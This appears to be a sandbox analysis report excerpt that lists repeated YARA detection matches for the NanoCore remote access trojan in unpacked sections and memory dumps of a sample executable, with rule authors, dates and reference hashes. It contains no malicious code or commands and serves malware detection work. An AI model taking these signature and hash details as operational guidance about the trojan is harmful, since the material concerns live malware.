      Source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.75d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.75d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.7620000.43.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.7620000.43.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.75f0000.40.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75f0000.40.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75f0000.40.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.75f0000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.3404f78.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.3404f78.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.3404f78.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.3404f78.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.5e10000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5e10000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5e10000.32.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.5e10000.32.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.43bc350.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.43bc350.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.43bc350.26.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.43bc350.26.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.75b0000.36.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75b0000.36.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75b0000.36.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.75b0000.36.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.33ae240.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.33ae240.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.33ae240.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.33ae240.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.34111c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.34111c0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.34111c0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.34111c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
